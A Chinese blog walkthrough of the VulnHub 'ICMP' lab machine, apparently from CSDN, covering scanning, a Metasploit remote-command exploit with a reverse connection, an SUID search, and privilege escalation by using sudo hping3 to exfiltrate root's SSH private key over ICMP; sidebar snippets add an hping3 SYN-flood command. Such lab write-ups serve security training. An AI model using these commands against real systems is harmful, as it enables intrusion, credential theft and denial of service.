vulnhub---ICMP 之 hping3提权

已于 2023-12-07 11:44:50 修改
阅读量1.3k 收藏
点赞数 15
文章标签: 安全
于 2023-12-07 11:17:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjjj34/article/details/134847279
版权

目录

下载链接

靶场搭建

信息收集

端口扫描

漏洞利用

ssh登录

Hping3提权

下载链接

官网链接:VulnHub

靶机下载链接:ICMP

靶场搭建

攻击机:kali IP:192.168.4.50

靶机:192.168.4.183

注意:如果靶机分不到IP的可以看我的另一篇文章靶机IP分配

信息收集

端口扫描

namp -A -sS -sV -T5 192.168.4.183

发现开放了两个端口,那么我们访问他的web服务。

漏洞利用

然后我就对其进行目录扫描,扫出来很多目录,但是全都没有作用,这里我就不展示了,那么就只能找找其他可以利于我们渗透的。于是我把主页的标题,搜索了一下你别说,还真就找到了。

那么就用这个漏洞执行远程命令执行

set rhosts 192.168.4.183

set TARGETURI /mon

set lhost 192.168.4.50

set lport 1234

run

好我们登录上去了那么我们就getshell。进入交互模式查看一下有哪些用户和拥有suid权限的文件

python -c "import pty; pty.spawn('/bin/bash')"

find / -user root -perm -4000 -print 2</dev/null

发现这个用户并没有可以提权的方式,发现有一个fox用户,那么我们试试登入fox用户,试着用fox用户进行提取。

发现了一个文件夹,两个文件,我们先查看两个文件。

local.txt里面是一段密文,我拿去解密,解不出来,那只能跳过了,reminder这个文件里大概就是让我们找一下crypt.php文件,我们先放一边,我们看看这个文件夹下有啥东西

发现没有权限查看,但是这里肯定东西, 说不定crypt.php就藏在这里,我们试着查看一下

ls -alhd crypt.php

发现还真有啊,那就查看一下吧

这个可能就是解密后的明文了,我们试着用这串明文ssh远程连接fox用户

ssh登录

进入了fox用户,看看fox可以利用sudo执行那些命令

发现可以利用hping3进行提权,通过sudo -l命令查看我们发现还得利用ICMP协议,那么就好办了,直接开始提权

Hping3提权

通过多次实验我发现利用普通的 hping3 提权方式,无法提权,我只好到网上去搜一搜教程了,发现可以利用hping3传输root用户的密钥,真是没想到,既然找到了方法,那就开始实验咯。

我们现在要有两个fox用户,一个用于接收,一个用于发送。

sudo hping3 --icmp 127.0.0.1 --data 5000 --sign sign --file /root/.ssh/id_rsa

sudo hping3 --icmp 127.0.0.1 --listen sign --safe

得到了密钥,我们将密钥拷贝下来,在kali上创建一个密钥文件,并命名为id_rsa文件。

ssh -i id_rsa root@192.168.4.183

咦?这里说id_rsa文件太开放了,好好好,那我们将id_rsa文件的权限改为600,在尝试远程链接

chmod 600 id_rsa

拥有root权限了,撒花。

YasYs
关注
  • 15
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hping-master.zip
11-04
yum -y install libpcap-devel tcl-devel cd hping ./configure make make install hping3 --rand-source [dst_ip] -p [dst_port] -S --flood
hping3-0.0.20051105-24.el7.x86_64.rpm
08-05
hping是用于生成和解析...目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。
内网渗透笔记——三层发现and四层发现
wang_zui_zui的博客
01-21 4017
三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a 存活主机 -b 数据包大小 -f 从文件中读取ip(不能和-g同时使用) -l 循环ping -g 网段,开始-结束地址 -u 不可达,ping不通 图一没有设置范围,图二设置了扫描的开始地址和结束地址,如果没有设置范围,就默认从头.
【oscp系列-Lord Of The Root-1.0.1】靶机6
weixin_44807430的博客
01-16 263
知行合一
Linux网络命令之 `Hping3`
有理论,有实验,有结论,可为一篇文章
08-17 8209
用法: hping3 host [options] -h --help 显示帮助 -v --version 显示版本 -c --count 发送数据包的数目 -i --interval 发送数据包间隔的时间 (uX即X微秒, 例如: -i u1000) --fast 等同 -i u1000...
linux 命令:ping、fping、gping、hping3、nping、tracert、traceroute、ip 和 ifconfig
热门推荐
freeking101的博客
05-20 8万+
linux 命令:ping、fping、gping、hping3、nping、tracert、traceroute
kali简单攻击hping3使用
weixin_51685970的博客
03-28 1万+
声明:本文的介绍仅用于实验,禁止非法攻击他人,网络安全,人人有责 大家好,下面为大家简单介绍一下kali的hping3的简单使用,主要介绍的是利用该工具进行SYS FLOOD攻击同时联动fping和nmap工具 实验环境:局域网 实验工具:虚拟机kali 电脑(实验攻击对象) 第一步:利用fping了解局域网里的IP活动情况 打开终端 查看获取IP地址 ifconfig 根据获取的IP使用fping扫描活动IP fping -asg xxx.xxx.xxx.xxx/xx ..
cute靶机-渗透-vulnhub-详解
chinese_cabbage0的博客
02-01 1164
cutenews这个系统所产生的漏洞,靶机的版本为2.1.2版本,并且含有详细的解题过程,一些原理等等的详解!
【渗透测试】VulnHub-Lord Of The Root: 1.0.1
m0_52923241的博客
11-20 239
VulnHub-Lord Of The Root: 1.0.1VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程小知识点常用工具 VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程 参考:https://mp.weixin.qq.com/s/RcdNhvbUh9A-ZMdnoULYMQ 距离上次打靶机隔好久了,因为一些事情耽搁了。渗透学习之路继续~ 渗透思路: 与前几个一样,显示nmap扫ip、端口,这次开放的只有22端口。 通过学习,有一个端口碰撞(
hping2-开源
07-17
hping2 是一个交互式数据包构造器和响应分析器,它使用与 ping 程序相同的 CLI(但有很多扩展)。 它可用于执行许多任务,例如测试防火墙规则、(欺骗)端口扫描等。
hping Command Line Interface (CLI)-开源
05-03
其次,hping的traceroute功能允许用户跟踪数据包在网络中的路由路径,但比标准的traceroute命令更强大,因为它支持TCP、UDP、ICMP以及SYN等多种协议。通过指定不同的协议和端口,用户可以更深入地了解网络路径上的...
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 299
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 352
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 446
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 475
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
Day98:云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
m0_74402888的博客
08-24 1118
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接未授权访问获取secrets和token利用。
建筑楼宇电气安全与能效管理
ACRELKY的博客
08-21 873
这些电气安全事故隐患包括过载、缺相、漏电、三相不平衡、跨接配电线路、零线地线混肴、线路老化、接触不良。楼宇建筑电气安全与能效管理系统与传统的电气监控系统截然不同,是一种基于泛终端的具有互联网功能的排除电气安全事故隐患的技术方案,是管理创新与现代信息技术融合的全新概念,能实现电气监测、控制、运行维护的全过程、自动化、一体化管理,能克服传统电气安全监控系统的缺陷,及时有效地发现和消除“孤岛”管理模式下存在的电气安全事隐患,提高工作效率、降低楼宇建筑配电系统的运行维护成本,具有显著的经济效益和社会效益。
中间件安全
2201_75572825的博客
08-20 1218
Tomcat是一个开源的Java Servlet容器,它可以作为独立的Web服务器或应用服务器,也可以作为其他Web服务器的插件来使用,如Apache HTTP Server。Tomcat支持JavaServlet、JavaServer Pages (JSP) 、Java Expression Language (EL) 和WebSocket等Java技术,并提供了许多企业级特性,如集群、安全性和可扩展性。
hping3怎么发icmp
06-10
要使用 hping3 发送 ICMP 包,可以使用以下命令: ```bash hping3 <目标IP> --icmp ``` 其中,`<目标IP>` 是你要发送 ICMP 包的目标 IP 地址。使用 `--icmp` 参数告诉 hping3 发送 ICMP 包。你还可以使用其他选项来指定 ICMP 包的内容、大小、数量等。例如,以下命令将发送一个大小为 64 字节的 ICMP 包,共发送 10 个 ICMP 包: ```bash hping3 <目标IP> --icmp --icmp-echo --data 64 -c 10 ``` 需要注意的是,发送 ICMP 包需要有足够的权限,否则可能会出现权限不足的错误。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值